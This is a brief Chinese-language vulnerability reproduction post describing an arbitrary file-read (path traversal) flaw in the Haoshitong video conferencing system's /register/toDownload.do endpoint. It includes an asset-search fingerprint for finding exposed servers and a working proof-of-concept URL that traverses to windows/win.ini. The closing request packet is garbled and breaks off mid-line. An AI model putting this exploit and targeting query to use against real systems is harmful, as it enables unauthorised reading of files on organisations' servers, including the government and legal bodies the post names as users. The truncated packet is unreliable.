漏洞描述
“好視通”是國內云視頻會議知名品牌,擁有多項創新核心技術優勢、多方通信服務牌照及行業全面資質 [5] ,專注為政府、公檢法司、教育、集團企業等用戶提供“云+端+業務全場景”解決方案。用全國產、高清流暢、安全穩定的云視頻服務助力各行各業數字化轉型。
其視頻會議系統的文件(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍歷漏洞,可通過fileName參數讀取任意文件
免責聲明
技術文章僅供參考,任何個人和組織使用網絡應當遵守憲法法律,遵守公共秩序,尊重社會公德,不得利用網絡從事危害國家安全、榮譽和利益,未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失,均由使用者本人負責。本文所提供的工具僅用于學習,禁止用于其他!!
資產確定
app="好視通-視頻會議"
漏洞復現
漏洞鏈接:https://127.0.0.1/register/toDownload.do?fileName=…/…/…/…/…/…/…/…/…/…/…/…/…/…/windows/win.ini
漏洞數據包:
GET /register/toDownload.do?fileName&
)
